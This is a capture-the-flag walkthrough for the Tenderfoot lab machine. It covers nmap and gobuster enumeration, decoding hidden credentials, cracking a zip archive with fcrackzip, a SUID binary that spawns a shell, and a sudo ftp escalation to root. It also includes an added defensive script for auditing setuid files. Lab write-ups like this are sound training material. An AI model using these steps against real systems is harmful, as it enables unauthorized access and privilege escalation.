
First, scan the local network with the command sudo netdiscover to find the Tenderfoot machine's IP.

I started by scanning the target machine for any open ports and services running on those ports using the Nmap tool.
nmap -p- -A <IP>

Start with a quick dirb scan of the HTTP website:

We found an interesting /entry.js whose source code gives us a username: monica. Don't forget it.
Let's start a new web enumeration. Download this wordlist and use it with gobuster.
gobuster dir --url http://<IP>/ --wordlist=/home/kali/Documents/big-dirbuster.txt -x js,php,txt,html,/ -t 100

In the source code of /fotocd, we found this:

It's Brainfuck code. Decode it with this online tool. It gives us the following message:
=================
JDk5OTkwJA==
=================
Did you found username ?
if yes:
Then you have cred. of one user, enter into user account
by ssh port. syntax:{ssh username@IP}
if not:
Then enumerate more :)
G00D LUCK !
We already have one username, so let's decode the base64 string.
echo "JDk5OTkwJA==" | base64 -d
>$99990$
Now we have username and password for ssh login : monica:$99990$

Open user1 flag :

To list all files in /monica, use the following command. -R lists subdirectories recursively and -a includes hidden files.
ls -Ra
We found a note.txt

Open it :

note.txt gives us the password to unzip joey.zip. Download joey.zip and unzip it with the command unzip joey.zip and the password #9175.
Now we need to crack gift.zip. We are going to use fcrackzip with the rockyou.txt list.
fcrackzip -u -D -p '/home/kali/Documents/rockyou.txt' gift.zip

The extracted message tells us to look for SUID binaries. Use this command (-perm /6000 matches files with either the setuid or the setgid bit set):
find / -type f -perm /6000 -ls 2>/dev/null

We run the following binary and a bash shell spawns:
/opt/exec/chandler
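
From the defender's side, the same find test can drive a routine audit that flags setuid/setgid files living outside the usual system directories, which is how a binary like the one above would stand out. This is an added example, not part of the original walkthrough; the function name audit_setid and the TRUSTED_DIRS allowlist are assumptions to adapt to your distribution (GNU find is required for -printf).

```shell
#!/usr/bin/env bash
# Added example: list setuid/setgid files and mark the ones that are not in
# an allowlisted system directory. TRUSTED_DIRS is an assumed default.
TRUSTED_DIRS="${TRUSTED_DIRS:-/usr/bin /usr/sbin /usr/lib /usr/libexec /bin /sbin}"

# audit_setid ROOT
# Prints one line per setuid/setgid regular file found under ROOT:
#   <STATUS> <octal mode> <owner> <path>
# STATUS is OK when the file sits under a trusted directory, REVIEW otherwise.
audit_setid() {
    local root="$1" mode owner path status dir
    # -xdev stays on one filesystem; -perm /6000 matches setuid OR setgid.
    find "$root" -xdev -type f -perm /6000 -printf '%m %u %p\n' 2>/dev/null |
    while read -r mode owner path; do
        status="REVIEW"
        for dir in $TRUSTED_DIRS; do
            case "$path" in
                "$dir"/*) status="OK" ;;
            esac
        done
        printf '%s %s %s %s\n' "$status" "$mode" "$owner" "$path"
    done
}

# Run the audit only when a root directory is passed on the command line,
# e.g.: ./audit_setid.sh / | grep '^REVIEW'
if [ "$#" -gt 0 ]; then
    audit_setid "$1"
fi
```

Any REVIEW line for a file under /opt, /home or /tmp deserves a look at who owns it and what it executes; removing the bit with chmod u-s,g-s closes the path if it is not needed.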

Now cd to /home/chandler/.cache/. There are 3 files; open note.txt:

Decode the base32 password :
echo "OBQXG43XMQ5FSMDVINZDIY3LJUZQ====" | base32 -d
>passwd:Y0uCr4ckM3
And it's time to be root. Exit the shell we have as chandler and authenticate as chandler with su chandler and the password Y0uCr4ckM3. With sudo -l we see that we can execute ftp as root. On this site, we found an exploit with ftp; let's use it:

cd /root
cat *

…well done